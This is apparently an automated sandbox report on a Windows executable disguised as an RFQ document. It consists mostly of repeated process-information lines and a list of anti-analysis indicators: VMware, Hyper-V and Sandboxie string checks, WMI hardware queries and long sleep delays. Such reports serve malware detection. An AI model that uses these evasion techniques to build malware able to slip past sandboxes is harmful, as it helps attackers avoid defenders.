                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Yara detected AntiVM3Show sources
                      Source: Yara matchFile source: 00000000.00000002.309447811.0000000003171000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: RFQ_99705546,99805546_Mark Cansick.exe PID: 6092, type: MEMORYSTR
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: RFQ_99705546,99805546_Mark Cansick.exe, 00000000.00000002.309447811.0000000003171000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                      Source: RFQ_99705546,99805546_Mark Cansick.exe, 00000000.00000002.309447811.0000000003171000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: RFQ_99705546,99805546_Mark Cansick.exe, 00000000.00000002.309447811.0000000003171000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exe TID: 4808Thread sleep time: -35854s >= -30000s
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exe TID: 6576Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6236Thread sleep time: -3689348814741908s >= -30000s
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exe TID: 4796Thread sleep time: -16602069666338586s >= -30000s
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exe TID: 6404Thread sleep count: 865 > 30
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exe TID: 6404Thread sleep count: 8983 > 30
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5706
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2643
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeWindow / User API: threadDelayed 865
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeWindow / User API: threadDelayed 8983
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: Identifier
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeThread delayed: delay time: 35854
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeThread delayed: delay time: 922337203685477
                      Source: RFQ_99705546,99805546_Mark Cansick.exe, 00000000.00000002.309036519.00000000012A2000.00000004.00000020.sdmpBinary or memory string: VMware
                      Source: RFQ_99705546,99805546_Mark Cansick.exe, 00000000.00000002.309447811.0000000003171000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: RFQ_99705546,99805546_Mark Cansick.exe, 00000000.00000002.309447811.0000000003171000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: RFQ_99705546,99805546_Mark Cansick.exe, 00000000.00000002.309447811.0000000003171000.00000004.00000001.sdmpBinary or memory string: \m%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: RFQ_99705546,99805546_Mark Cansick.exe, 00000000.00000002.309447811.0000000003171000.00000004.00000001.sdmpBinary or memory string: VMWARE
                      Source: RFQ_99705546,99805546_Mark Cansick.exe, 00000000.00000002.309036519.00000000012A2000.00000004.00000020.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwarePLY4DGL3Win32_VideoController4YKFFPPTVideoController120060621000000.000000-0004.753658display.infMSBDA3SHBBGX8PCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsC6DMVNWP
                      Source: RFQ_99705546,99805546_Mark Cansick.exe, 00000000.00000002.309447811.0000000003171000.00000004.00000001.sdmpBinary or memory string: \m"SOFTWARE\VMware, Inc.\VMware Tools
                      Source: RFQ_99705546,99805546_Mark Cansick.exe, 00000000.00000002.309447811.0000000003171000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                      Source: RFQ_99705546,99805546_Mark Cansick.exe, 00000008.00000002.815940786.00000000015F4000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: RFQ_99705546,99805546_Mark Cansick.exe, 00000000.00000002.309447811.0000000003171000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess token adjusted: Debug
